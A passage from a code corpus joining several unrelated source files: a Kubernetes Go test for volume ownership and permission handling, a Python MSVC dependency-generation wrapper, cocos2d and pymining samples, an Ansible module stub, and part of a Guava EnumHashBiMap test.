            f.write(self.raw)
        with open(os.path.join(folder, name+'.trailing_data'), 'wb') as f:
            for k, v in self.trailing_data.iteritems():
                raw = '%s : %r\n\n'%(k, v)
                f.write(raw.encode('utf-8'))

    def __len__(self):
        # Length of the decompressed text payload.
        return len(self.raw)
# }}} | unknown | codeparrot/codeparrot-clean | ||
//go:build linux
/*
Copyright 2020 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package volume
import (
"fmt"
"os"
"path/filepath"
"syscall"
"testing"
"time"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/record"
utiltesting "k8s.io/client-go/util/testing"
)
// localFakeMounter is a minimal fake mounter used by the tests in this file.
// It only reports a fixed path and attributes; all mutating operations are
// no-ops. NOTE(review): presumably satisfies the package's Mounter
// interface — confirm against the interface definition.
type localFakeMounter struct {
	path       string
	attributes Attributes
}

// GetPath returns the configured fake path.
func (l *localFakeMounter) GetPath() string {
	return l.path
}

// GetAttributes returns the configured fake attributes.
func (l *localFakeMounter) GetAttributes() Attributes {
	return l.attributes
}

// SetUp is a no-op; the fake never mounts anything.
func (l *localFakeMounter) SetUp(mounterArgs MounterArgs) error {
	return nil
}

// SetUpAt is a no-op; the fake never mounts anything.
func (l *localFakeMounter) SetUpAt(dir string, mounterArgs MounterArgs) error {
	return nil
}

// GetMetrics is unimplemented for the fake and always returns nil, nil.
func (l *localFakeMounter) GetMetrics() (*Metrics, error) {
	return nil, nil
}
// TestSkipPermissionChange verifies skipPermissionChange's decision for
// combinations of fsGroupChangePolicy, GID-ownership match, permission-bit
// match and setgid-bit match on the volume root directory. The recursive
// change may be skipped only when the policy is OnRootMismatch and the root
// already matches in all three respects.
func TestSkipPermissionChange(t *testing.T) {
	always := v1.FSGroupChangeAlways
	onrootMismatch := v1.FSGroupChangeOnRootMismatch
	tests := []struct {
		description         string
		fsGroupChangePolicy *v1.PodFSGroupChangePolicy
		gidOwnerMatch       bool
		permissionMatch     bool
		sgidMatch           bool
		// skipPermission is the expected result (fixed spelling of the
		// original skipPermssion field).
		skipPermission bool
	}{
		{
			description:    "skippermission=false, policy=nil",
			skipPermission: false,
		},
		{
			description:         "skippermission=false, policy=always",
			fsGroupChangePolicy: &always,
			skipPermission:      false,
		},
		{
			description:         "skippermission=false, policy=always, gidmatch=true",
			fsGroupChangePolicy: &always,
			skipPermission:      false,
			gidOwnerMatch:       true,
		},
		{
			description:         "skippermission=false, policy=nil, gidmatch=true",
			fsGroupChangePolicy: nil,
			skipPermission:      false,
			gidOwnerMatch:       true,
		},
		{
			description:         "skippermission=false, policy=onrootmismatch, gidmatch=false",
			fsGroupChangePolicy: &onrootMismatch,
			gidOwnerMatch:       false,
			skipPermission:      false,
		},
		{
			description:         "skippermission=false, policy=onrootmismatch, gidmatch=true, permmatch=false",
			fsGroupChangePolicy: &onrootMismatch,
			gidOwnerMatch:       true,
			permissionMatch:     false,
			skipPermission:      false,
		},
		{
			description:         "skippermission=false, policy=onrootmismatch, gidmatch=true, permmatch=true",
			fsGroupChangePolicy: &onrootMismatch,
			gidOwnerMatch:       true,
			permissionMatch:     true,
			skipPermission:      false,
		},
		{
			description:         "skippermission=false, policy=onrootmismatch, gidmatch=true, permmatch=true, sgidmatch=true",
			fsGroupChangePolicy: &onrootMismatch,
			gidOwnerMatch:       true,
			permissionMatch:     true,
			sgidMatch:           true,
			skipPermission:      true,
		},
	}

	for _, test := range tests {
		t.Run(test.description, func(t *testing.T) {
			tmpDir, err := utiltesting.MkTmpdir("volume_linux_test")
			if err != nil {
				t.Fatalf("error creating temp dir: %v", err)
			}
			defer func() {
				err := os.RemoveAll(tmpDir)
				if err != nil {
					t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
				}
			}()

			info, err := os.Lstat(tmpDir)
			if err != nil {
				t.Fatalf("error reading permission of tmpdir: %v", err)
			}

			stat, ok := info.Sys().(*syscall.Stat_t)
			if !ok || stat == nil {
				t.Fatalf("error reading permission stats for tmpdir: %s", tmpDir)
			}

			gid := stat.Gid

			// Pick an expected GID that either matches the directory's real
			// group owner, or (gid+3000) which is guaranteed to differ.
			var expectedGID int64
			if test.gidOwnerMatch {
				expectedGID = int64(gid)
			} else {
				expectedGID = int64(gid + 3000)
			}

			// Build the permission mask for the scenario: rw always, exec
			// when the bits should match, and set/clear setgid accordingly.
			mask := rwMask
			if test.permissionMatch {
				mask |= execMask
			}
			if test.sgidMatch {
				mask |= os.ModeSetgid
				mask = info.Mode() | mask
			} else {
				nosgidPerm := info.Mode() &^ os.ModeSetgid
				mask = nosgidPerm | mask
			}

			err = os.Chmod(tmpDir, mask)
			if err != nil {
				t.Errorf("Chmod failed on %v: %v", tmpDir, err)
			}

			mounter := &localFakeMounter{path: tmpDir}
			ok = skipPermissionChange(mounter, tmpDir, &expectedGID, test.fsGroupChangePolicy)
			if ok != test.skipPermission {
				t.Errorf("for %s expected skipPermission to be %v got %v", test.description, test.skipPermission, ok)
			}
		})
	}
}
// TestSetVolumeOwnershipMode verifies how ChangePermissions treats a
// subdirectory ("roguedir") with wrong permissions, depending on the
// fsGroupChangePolicy and whether the volume root already has the
// expected mode bits (rw+exec+setgid).
func TestSetVolumeOwnershipMode(t *testing.T) {
	always := v1.FSGroupChangeAlways
	onrootMismatch := v1.FSGroupChangeOnRootMismatch
	expectedMask := rwMask | os.ModeSetgid | execMask

	tests := []struct {
		description         string
		fsGroupChangePolicy *v1.PodFSGroupChangePolicy
		setupFunc           func(path string) error
		assertFunc          func(path string) error
	}{
		{
			// Always-policy recurses regardless of the root's mode, so the
			// rogue subdirectory must end up fixed.
			description:         "featuregate=on, fsgroupchangepolicy=always",
			fsGroupChangePolicy: &always,
			setupFunc: func(path string) error {
				info, err := os.Lstat(path)
				if err != nil {
					return err
				}
				// change mode of root folder to be right
				err = os.Chmod(path, info.Mode()|expectedMask)
				if err != nil {
					return err
				}

				// create a subdirectory with invalid permissions
				rogueDir := filepath.Join(path, "roguedir")
				nosgidPerm := info.Mode() &^ os.ModeSetgid
				err = os.Mkdir(rogueDir, nosgidPerm)
				if err != nil {
					return err
				}
				return nil
			},
			assertFunc: func(path string) error {
				rogueDir := filepath.Join(path, "roguedir")
				hasCorrectPermissions := verifyDirectoryPermission(rogueDir, false /*readOnly*/)
				if !hasCorrectPermissions {
					return fmt.Errorf("invalid permissions on %s", rogueDir)
				}
				return nil
			},
		},
		{
			// OnRootMismatch with a matching root skips the recursive walk,
			// so the rogue subdirectory must remain broken.
			description:         "featuregate=on, fsgroupchangepolicy=onrootmismatch,rootdir=validperm",
			fsGroupChangePolicy: &onrootMismatch,
			setupFunc: func(path string) error {
				info, err := os.Lstat(path)
				if err != nil {
					return err
				}
				// change mode of root folder to be right
				err = os.Chmod(path, info.Mode()|expectedMask)
				if err != nil {
					return err
				}

				// create a subdirectory with invalid permissions
				rogueDir := filepath.Join(path, "roguedir")
				err = os.Mkdir(rogueDir, rwMask)
				if err != nil {
					return err
				}
				return nil
			},
			assertFunc: func(path string) error {
				rogueDir := filepath.Join(path, "roguedir")
				hasCorrectPermissions := verifyDirectoryPermission(rogueDir, false /*readOnly*/)
				if hasCorrectPermissions {
					return fmt.Errorf("invalid permissions on %s", rogueDir)
				}
				return nil
			},
		},
		{
			// OnRootMismatch with a NON-matching root must still recurse and
			// fix the rogue subdirectory.
			description:         "featuregate=on, fsgroupchangepolicy=onrootmismatch,rootdir=invalidperm",
			fsGroupChangePolicy: &onrootMismatch,
			setupFunc: func(path string) error {
				// give the root folder permissions that do NOT match
				// expectedMask (0770 lacks the setgid bit)
				err := os.Chmod(path, 0770)
				if err != nil {
					return err
				}

				// create a subdirectory with invalid permissions
				rogueDir := filepath.Join(path, "roguedir")
				err = os.Mkdir(rogueDir, rwMask)
				if err != nil {
					return err
				}
				return nil
			},
			assertFunc: func(path string) error {
				rogueDir := filepath.Join(path, "roguedir")
				hasCorrectPermissions := verifyDirectoryPermission(rogueDir, false /*readOnly*/)
				if !hasCorrectPermissions {
					return fmt.Errorf("invalid permissions on %s", rogueDir)
				}
				return nil
			},
		},
	}

	for _, test := range tests {
		t.Run(test.description, func(t *testing.T) {
			tmpDir, err := utiltesting.MkTmpdir("volume_linux_ownership")
			if err != nil {
				t.Fatalf("error creating temp dir: %v", err)
			}
			defer func() {
				err := os.RemoveAll(tmpDir)
				if err != nil {
					t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
				}
			}()

			info, err := os.Lstat(tmpDir)
			if err != nil {
				t.Fatalf("error reading permission of tmpdir: %v", err)
			}

			stat, ok := info.Sys().(*syscall.Stat_t)
			if !ok || stat == nil {
				t.Fatalf("error reading permission stats for tmpdir: %s", tmpDir)
			}

			// Use the directory's own GID so the chown part is a no-op and
			// only the permission bits are exercised.
			var expectedGID = int64(stat.Gid)

			err = test.setupFunc(tmpDir)
			if err != nil {
				t.Errorf("for %s error running setup with: %v", test.description, err)
			}

			mounter := &localFakeMounter{path: "FAKE_DIR_DOESNT_EXIST"} // SetVolumeOwnership() must rely on tmpDir
			ownershipChanger := NewVolumeOwnership(mounter, tmpDir, &expectedGID, test.fsGroupChangePolicy, nil)
			err = ownershipChanger.ChangePermissions()
			if err != nil {
				t.Errorf("for %s error changing ownership with: %v", test.description, err)
			}
			err = test.assertFunc(tmpDir)
			if err != nil {
				t.Errorf("for %s error verifying permissions with: %v", test.description, err)
			}
		})
	}
}
// TestProgressTracking verifies that slow recursive permission changes emit
// progress warning events through the pod's event recorder, and that fast
// changes — or a missing pod reference — emit none. The package-level timing
// knobs and the per-file change function are overridden so the test stays
// fast and deterministic.
func TestProgressTracking(t *testing.T) {
	alwaysApplyPolicy := v1.FSGroupChangeAlways
	var expectedGID int64 = 9999

	// capture originals so Cleanup can restore them
	originalfilePermissionChangeFunc := filePermissionChangeFunc
	originalProgressReportDuration := progressReportDuration
	originalfirstEventReportDuration := firstEventReportDuration

	var permissionSleepDuration = 5 * time.Millisecond

	// Override how often progress is reported
	progressReportDuration = 300 * time.Millisecond
	// Override when first event about progress is reported
	firstEventReportDuration = 150 * time.Millisecond

	// Override how permission change is applied, so as to artificially slow
	// permission change
	filePermissionChangeFunc = func(filename string, fsGroup *int64, readonly bool, info os.FileInfo) error {
		time.Sleep(permissionSleepDuration)
		// The real change may fail here (e.g. chown to GID 9999 without
		// root); its error is deliberately dropped because this test only
		// exercises progress reporting, not the change itself.
		originalfilePermissionChangeFunc(filename, fsGroup, readonly, info) //nolint:errcheck
		return nil
	}
	t.Cleanup(func() {
		filePermissionChangeFunc = originalfilePermissionChangeFunc
		progressReportDuration = originalProgressReportDuration
		firstEventReportDuration = originalfirstEventReportDuration
	})

	pod := &v1.Pod{
		ObjectMeta: metav1.ObjectMeta{
			Name: "pod1",
			UID:  "pod1uid",
		},
		Spec: v1.PodSpec{
			Volumes: []v1.Volume{
				{
					Name: "volume-name",
					VolumeSource: v1.VolumeSource{
						GCEPersistentDisk: &v1.GCEPersistentDiskVolumeSource{
							PDName: "fake-device1",
						},
					},
				},
			},
		},
	}

	tests := []struct {
		name                             string
		filePermissionChangeTimeDuration time.Duration
		totalWaitTime                    time.Duration
		currentPod                       *v1.Pod
		expectedEvents                   []string
	}{
		{
			name:                             "When permission change finishes quickly, no events should be logged",
			filePermissionChangeTimeDuration: 30 * time.Millisecond,
			totalWaitTime:                    1 * time.Second,
			currentPod:                       pod,
			expectedEvents:                   []string{},
		},
		{
			name:                             "When no pod is specified, no events should be logged",
			filePermissionChangeTimeDuration: 300 * time.Millisecond,
			totalWaitTime:                    1 * time.Second,
			currentPod:                       nil,
			expectedEvents:                   []string{},
		},
		{
			// Typo fixed: "loo long" -> "too long".
			name:                             "When permission change takes too long and pod is specified",
			filePermissionChangeTimeDuration: 600 * time.Millisecond,
			totalWaitTime:                    1 * time.Second,
			currentPod:                       pod,
			expectedEvents: []string{
				"Warning VolumePermissionChangeInProgress Setting volume ownership for pod1uid/volumes/faketype is taking longer than expected, consider using OnRootMismatch - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#configure-volume-permission-and-ownership-change-policy-for-pods",
				"Warning VolumePermissionChangeInProgress Setting volume ownership for pod1uid/volumes/faketype, processed 1 files.",
			},
		},
	}

	for i := range tests {
		tc := tests[i]
		t.Run(tc.name, func(t *testing.T) {
			tmpDir, err := utiltesting.MkTmpdir("volume_linux_ownership")
			if err != nil {
				t.Fatalf("error creating temp dir: %v", err)
			}
			podUID := "placeholder"
			if tc.currentPod != nil {
				podUID = string(tc.currentPod.UID)
			}
			volumePath := filepath.Join(tmpDir, podUID, "volumes", "faketype")
			err = os.MkdirAll(volumePath, 0770)
			if err != nil {
				t.Fatalf("error creating volumePath %s: %v", volumePath, err)
			}
			defer func() {
				err := os.RemoveAll(tmpDir)
				if err != nil {
					t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
				}
			}()

			mounter := &localFakeMounter{path: "FAKE_DIR_DOESNT_EXIST"} // SetVolumeOwnership() must rely on tmpDir
			fakeRecorder := record.NewFakeRecorder(100)
			recordedEvents := []string{}

			// Set how long file permission change takes
			permissionSleepDuration = tc.filePermissionChangeTimeDuration

			ownershipChanger := NewVolumeOwnership(mounter, volumePath, &expectedGID, &alwaysApplyPolicy, nil)
			if tc.currentPod != nil {
				ownershipChanger.AddProgressNotifier(tc.currentPod, fakeRecorder)
			}
			err = ownershipChanger.ChangePermissions()
			if err != nil {
				t.Errorf("unexpected error: %+v", err)
			}
			time.Sleep(tc.totalWaitTime)

			actualEventCount := len(fakeRecorder.Events)
			// An exact count is only enforced when zero events are expected;
			// presumably the slow case may buffer extra progress events.
			if len(tc.expectedEvents) == 0 && actualEventCount != len(tc.expectedEvents) {
				t.Errorf("expected 0 events got %d", actualEventCount)
			}

			for range actualEventCount {
				event := <-fakeRecorder.Events
				recordedEvents = append(recordedEvents, event)
			}
			for i, event := range tc.expectedEvents {
				if event != recordedEvents[i] {
					t.Errorf("expected event %d to be %s, got: %s", i, event, recordedEvents[i])
				}
			}
		})
	}
}
// verifyDirectoryPermission reports whether path carries the directory
// permissions kubelet is expected to apply: read/write (or read-only when
// readonly is set) plus execute bits, and the setgid bit. Returns false if
// the path cannot be stat'ed.
func verifyDirectoryPermission(path string, readonly bool) bool {
	info, err := os.Lstat(path)
	if err != nil {
		return false
	}
	if stat, ok := info.Sys().(*syscall.Stat_t); !ok || stat == nil {
		return false
	}
	// Required permission bits for this mode.
	want := rwMask
	if readonly {
		want = roMask
	}
	want |= execMask

	perm := info.Mode().Perm()
	return (want&perm == want) && (info.Mode()&os.ModeSetgid != 0)
}
// TestSetVolumeOwnershipOwner verifies that ChangePermissions applies the
// requested fsGroup to regular files and to symlinks, and leaves ownership
// untouched when fsGroup is nil. Skipped when not running as root, since it
// needs to chown to a foreign GID. (Local currentUid renamed to currentUID
// for the Go initialism convention, matching currentGID.)
func TestSetVolumeOwnershipOwner(t *testing.T) {
	fsGroup := int64(3000)
	currentUID := os.Geteuid()
	if currentUID != 0 {
		t.Skip("running as non-root")
	}
	currentGID := os.Getgid()

	tests := []struct {
		description string
		fsGroup     *int64
		setupFunc   func(path string) error
		assertFunc  func(path string) error
	}{
		{
			description: "fsGroup=nil",
			fsGroup:     nil,
			setupFunc: func(path string) error {
				filename := filepath.Join(path, "file.txt")
				file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0755)
				if err != nil {
					return err
				}
				file.Close()
				return nil
			},
			assertFunc: func(path string) error {
				filename := filepath.Join(path, "file.txt")
				// No fsGroup: the file keeps the creator's uid/gid.
				if !verifyFileOwner(filename, currentUID, currentGID) {
					return fmt.Errorf("invalid owner on %s", filename)
				}
				return nil
			},
		},
		{
			description: "*fsGroup=3000",
			fsGroup:     &fsGroup,
			setupFunc: func(path string) error {
				filename := filepath.Join(path, "file.txt")
				file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0755)
				if err != nil {
					return err
				}
				file.Close()
				return nil
			},
			assertFunc: func(path string) error {
				filename := filepath.Join(path, "file.txt")
				// fsGroup set: the file's group must become 3000.
				if !verifyFileOwner(filename, currentUID, int(fsGroup)) {
					return fmt.Errorf("invalid owner on %s", filename)
				}
				return nil
			},
		},
		{
			description: "symlink",
			fsGroup:     &fsGroup,
			setupFunc: func(path string) error {
				filename := filepath.Join(path, "file.txt")
				file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0755)
				if err != nil {
					return err
				}
				file.Close()

				symname := filepath.Join(path, "file_link.txt")
				err = os.Symlink(filename, symname)
				if err != nil {
					return err
				}

				return nil
			},
			assertFunc: func(path string) error {
				symname := filepath.Join(path, "file_link.txt")
				// The symlink itself (Lstat'ed) must carry the fsGroup too.
				if !verifyFileOwner(symname, currentUID, int(fsGroup)) {
					return fmt.Errorf("invalid owner on %s", symname)
				}
				return nil
			},
		},
	}

	for _, test := range tests {
		t.Run(test.description, func(t *testing.T) {
			tmpDir, err := utiltesting.MkTmpdir("volume_linux_ownership")
			if err != nil {
				t.Fatalf("error creating temp dir: %v", err)
			}
			defer func() {
				err := os.RemoveAll(tmpDir)
				if err != nil {
					t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
				}
			}()
			err = test.setupFunc(tmpDir)
			if err != nil {
				t.Errorf("for %s error running setup with: %v", test.description, err)
			}

			mounter := &localFakeMounter{path: tmpDir}
			always := v1.FSGroupChangeAlways
			ownershipChanger := NewVolumeOwnership(mounter, tmpDir, test.fsGroup, &always, nil)
			err = ownershipChanger.ChangePermissions()
			if err != nil {
				t.Errorf("for %s error changing ownership with: %v", test.description, err)
			}
			err = test.assertFunc(tmpDir)
			if err != nil {
				t.Errorf("for %s error verifying permissions with: %v", test.description, err)
			}
		})
	}
}
// verifyFileOwner checks if given path is owned by uid and gid.
// It returns true if it is otherwise false.
func verifyFileOwner(path string, uid, gid int) bool {
info, err := os.Lstat(path)
if err != nil {
return false
}
stat, ok := info.Sys().(*syscall.Stat_t)
if !ok || stat == nil {
return false
}
if int(stat.Uid) != uid || int(stat.Gid) != gid {
return false
}
return true
} | go | github | https://github.com/kubernetes/kubernetes | pkg/volume/volume_linux_test.go |
#!/usr/bin/env python
#
# run msvs compiler with /showincludes and generate make dependencies
#
from optparse import OptionParser, BadOptionError
from os.path import basename, splitext
from subprocess import Popen, PIPE, STDOUT
from sys import argv
# an options parser that will pass-through unrecognized options
# An OptionParser that silently passes unrecognized options through to the
# positional-argument list (self.largs) instead of erroring out, so arbitrary
# cl.exe flags can be forwarded untouched.
#
# Fix: the original used the Python-2-only `except BadOptionError, err`
# syntax and bound an exception variable it never used; a bare
# `except BadOptionError:` clause is behavior-identical and parses on both
# Python 2 and 3.
class PassThroughOptionParser(OptionParser):

    def _process_long_opt(self, rargs, values):
        # Remember the token before optparse consumes it from rargs.
        arg = rargs[0]
        try:
            OptionParser._process_long_opt(self, rargs, values)
        except BadOptionError:
            # Unknown long option: keep it as a pass-through argument.
            self.largs.append(arg)

    def _process_short_opts(self, rargs, values):
        arg = rargs[0]
        try:
            OptionParser._process_short_opts(self, rargs, values)
        except BadOptionError:
            # Unknown short option: keep it as a pass-through argument.
            self.largs.append(arg)
# Option callback for -M: record that dependency generation was requested and
# forward cl.exe's -showIncludes switch so included headers get printed.
def handle_dependency_option(option, opt, value, parser):
    parser.largs.append('-showIncludes')
    setattr(parser.values, option.dest, True)
# Option callback for cl.exe's -F family of output options. optparse matches
# on -F; everything after it is the option value. Only -Fo (object-file
# output) needs special handling: it names the build target and hence the
# dependency file. The full token is always forwarded to the compiler.
def handle_output_options(option, opt, value, parser):
    if value[0] == 'o':
        target = value[1:]
        setattr(parser.values, option.dest, target)
        parser.values.depfile = '%s.d' % (splitext(target)[0],)
    parser.largs.append(opt + value)
# Build the option parser: -M turns on dependency tracking, -F captures the
# MSVC output options (only -Fo, the object-file name, matters here); any
# other flag is passed straight through to cl.exe.
parser = PassThroughOptionParser()
parser.add_option('-M',
                  action='callback',
                  callback=handle_dependency_option,
                  dest='dependencies',
                  help='write dependency file')
parser.add_option('-F',
                  action='callback',
                  callback=handle_output_options,
                  type='string', dest='target',
                  help='standard MSVC cl.exe output options')

# parse options
(options, args) = parser.parse_args()

# if not output option is specified, attempt to infer
# the target from the first non-option argument
if options.dependencies and not options.target:
    # First argument that is not a -/… or /… switch is taken as the source
    # file; the target is its basename with an .obj extension.
    firstNonOpt = filter(lambda a: a[0] not in ('-', '/'), args)[0]
    options.target = '%s.obj' % (splitext(firstNonOpt)[0],)

# insert the compiler command (basename of this script)
# e.g. a script named cl.py runs `cl` — the wrapper shadows the real tool.
args.insert(0, splitext(basename(argv[0]))[0])

# run the command tracking dependencies
# cl.exe with -showIncludes prints "Note: including file: <path>" for every
# header; collect those (deduplicated), echo everything else verbatim.
deps = []
p = Popen(args, stdout=PIPE, stderr=STDOUT)
for line in p.stdout:
    line = line.rstrip()
    if line.startswith('Note: including file:'):
        # NOTE(review): last whitespace-separated token — assumes header
        # paths contain no spaces; verify for quoted MSVC paths.
        dep = line.split()[-1]
        if dep not in deps:
            deps.append(dep)
    else:
        print line

p.wait()

# if successful, write the dependency file
# Format: "target: dep1 dep2 ..." followed by an empty rule per dependency
# (the usual make idiom so deleted headers do not break the build).
if p.returncode == 0 and options.dependencies:
    f = open('%s.d' % splitext(options.target)[0], 'wt')
    f.writelines([options.target, ': \\\n' ] +
                 [' %s \\\n' % (dep,) for dep in deps])
    f.writelines(['\n\n' ] +
                 ['%s:\n' % (dep,) for dep in deps])
    f.close()

# propagate the compiler's exit status
exit(p.returncode)
from __future__ import division, print_function, unicode_literals
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, t 1.1, s, t 2.1, s, t 3.1, s, q"
tags = "Label, color, text"
import cocos
from cocos.director import director
from cocos.sprite import Sprite
from cocos.actions import Rotate, Repeat, Delay, CallFunc
from cocos.text import Label
class TestLayer(cocos.layer.Layer):

    """Layer showing a centered, slowly rotating label whose text and color
    cycle through three preset RGBA values, one change per second."""

    def __init__(self):
        super(TestLayer, self).__init__()

        width, height = director.get_window_size()

        self.color1 = [255, 0, 0, 255]
        self.color2 = [0, 0, 255, 255]

        self.label = Label('', (width // 2, height // 2))
        # One full revolution over ten seconds.
        self.label.do(Rotate(360, 10))
        # Repeat the 3-step color cycle forever, one step per second.
        cycle = (Delay(1) + CallFunc(self.set_color, 0) +
                 Delay(1) + CallFunc(self.set_color, 1) +
                 Delay(1) + CallFunc(self.set_color, 2))
        self.label.do(Repeat(cycle))
        self.add(self.label)
        self.set_color(2)

    def set_color(self, color_selector):
        # Pick the preset color and show its RGBA tuple as the label text.
        palette = [(255, 32, 64, 255), (0, 240, 100, 255), (90, 90, 250, 255)]
        chosen = palette[color_selector]
        self.label.element.text = "(%s, %s, %s, %s)" % chosen
        self.label.element.color = chosen
def main():
    """Initialise the director and run a scene containing a TestLayer."""
    director.init()
    scene = cocos.scene.Scene(TestLayer())
    director.run(scene)

if __name__ == '__main__':
    main()
"""
this is a sample shows twc-naive-bayes train and test
"""
import math
import pickle
import sys,os
sys.path.append(os.path.join(os.getcwd(), '../'))
from pymining.math.matrix import Matrix
from pymining.math.text2matrix import Text2Matrix
from pymining.nlp.segmenter import Segmenter
from pymining.common.global_info import GlobalInfo
from pymining.common.configuration import Configuration
from pymining.preprocessor.chisquare_filter import ChiSquareFilter
from pymining.classifier.twc_naive_bayes import TwcNaiveBayes
if __name__ == "__main__":
    # Load configuration and seed the global term/class statistics.
    config = Configuration.FromFile("conf/test.xml")
    GlobalInfo.Init(config, "__global__")
    # Vectorize the training corpus into a term matrix and labels.
    txt2mat = Text2Matrix(config, "__matrix__")
    [trainx, trainy] = txt2mat.CreateTrainMatrix("data/train.txt")
    # Chi-square feature selection: fit on the training data, then apply.
    chiFilter = ChiSquareFilter(config, "__filter__")
    chiFilter.TrainFilter(trainx, trainy)
    [trainx, trainy] = chiFilter.MatrixFilter(trainx, trainy)
    # Train the TWC naive-Bayes model on the filtered matrix.
    nbModel = TwcNaiveBayes(config, "twc_naive_bayes")
    nbModel.Train(trainx, trainy)
    # Vectorize the test corpus with the same vocabulary and filter, then
    # evaluate. The predictions are currently unused beyond the call itself.
    [testx, testy] = txt2mat.CreatePredictMatrix("data/test.txt")
    [testx, testy] = chiFilter.MatrixFilter(testx, testy)
    retY = nbModel.TestMatrix(testx, testy)
#!/usr/bin/python
from __future__ import annotations
# Ansible module metadata consumed by ansible-doc; the YAML content must stay
# exactly as-is for the documentation tests that reference this module.
DOCUMENTATION = """
---
module: subdir_module
short_description: A module in multiple subdirectories
description:
  - A module in multiple subdirectories
author:
  - Ansible Core Team
version_added: 1.0.0

options: {}
"""

EXAMPLES = """
"""

RETURN = """
"""

from ansible.module_utils.basic import AnsibleModule


def main():
    # Minimal module: accepts no options and immediately reports success.
    module = AnsibleModule(
        argument_spec=dict(),
    )

    module.exit_json()


if __name__ == '__main__':
    main()
/*
* Copyright (C) 2007 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.collect.Maps.immutableEntry;
import static com.google.common.collect.ReflectionFreeAssertThrows.assertThrows;
import static com.google.common.truth.Truth.assertThat;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.common.collect.testing.SampleElements;
import com.google.common.collect.testing.features.CollectionFeature;
import com.google.common.collect.testing.features.CollectionSize;
import com.google.common.collect.testing.features.MapFeature;
import com.google.common.collect.testing.google.BiMapTestSuiteBuilder;
import com.google.common.collect.testing.google.TestBiMapGenerator;
import com.google.common.testing.NullPointerTester;
import com.google.common.testing.SerializableTester;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.jspecify.annotations.NullUnmarked;
/**
* Tests for {@code EnumHashBiMap}.
*
* @author Mike Bostock
*/
@J2ktIncompatible // EnumHashBiMap
@GwtCompatible
@NullUnmarked
public class EnumHashBiMapTest extends TestCase {
  // Sample enum key types used throughout the tests below.
  private enum Currency {
    DOLLAR,
    FRANC,
    PESO,
    POUND,
    YEN
  }

  private enum Country {
    CANADA,
    CHILE,
    JAPAN,
    SWITZERLAND,
    UK
  }

  /**
   * Generator plugged into {@code BiMapTestSuiteBuilder} so the collection
   * testing framework can build populated {@code EnumHashBiMap} instances.
   */
  @AndroidIncompatible // test-suite builders
  public static final class EnumHashBiMapGenerator implements TestBiMapGenerator<Country, String> {
    @SuppressWarnings("unchecked")
    @Override
    public BiMap<Country, String> create(Object... entries) {
      BiMap<Country, String> result = EnumHashBiMap.create(Country.class);
      for (Object o : entries) {
        Entry<Country, String> entry = (Entry<Country, String>) o;
        result.put(entry.getKey(), entry.getValue());
      }
      return result;
    }

    @Override
    public SampleElements<Entry<Country, String>> samples() {
      return new SampleElements<>(
          immutableEntry(Country.CANADA, "DOLLAR"),
          immutableEntry(Country.CHILE, "PESO"),
          immutableEntry(Country.UK, "POUND"),
          immutableEntry(Country.JAPAN, "YEN"),
          immutableEntry(Country.SWITZERLAND, "FRANC"));
    }

    @SuppressWarnings("unchecked")
    @Override
    public Entry<Country, String>[] createArray(int length) {
      return (Entry<Country, String>[]) new Entry<?, ?>[length];
    }

    @Override
    public Iterable<Entry<Country, String>> order(List<Entry<Country, String>> insertionOrder) {
      return insertionOrder;
    }

    @Override
    public Country[] createKeyArray(int length) {
      return new Country[length];
    }

    @Override
    public String[] createValueArray(int length) {
      return new String[length];
    }
  }

  // Combines the generated BiMap conformance suite with the hand-written
  // tests in this class.
  @J2ktIncompatible
  @GwtIncompatible // suite
  @AndroidIncompatible // test-suite builders
  public static Test suite() {
    TestSuite suite = new TestSuite();
    suite.addTest(
        BiMapTestSuiteBuilder.using(new EnumHashBiMapGenerator())
            .named("EnumHashBiMap")
            .withFeatures(
                CollectionSize.ANY,
                CollectionFeature.SERIALIZABLE,
                CollectionFeature.SUPPORTS_ITERATOR_REMOVE,
                MapFeature.ALLOWS_NULL_VALUES,
                MapFeature.GENERAL_PURPOSE,
                CollectionFeature.KNOWN_ORDER)
            .createTestSuite());
    suite.addTestSuite(EnumHashBiMapTest.class);
    return suite;
  }

  public void testCreate() {
    EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(Currency.class);
    assertTrue(bimap.isEmpty());
    assertEquals("{}", bimap.toString());
    assertEquals(HashBiMap.create(), bimap);
    bimap.put(Currency.DOLLAR, "dollar");
    assertEquals("dollar", bimap.get(Currency.DOLLAR));
    assertEquals(Currency.DOLLAR, bimap.inverse().get("dollar"));
  }

  public void testCreateFromMap() {
    /* Test with non-empty Map. */
    Map<Currency, String> map =
        ImmutableMap.of(
            Currency.DOLLAR, "dollar",
            Currency.PESO, "peso",
            Currency.FRANC, "franc");
    EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(map);
    assertEquals("dollar", bimap.get(Currency.DOLLAR));
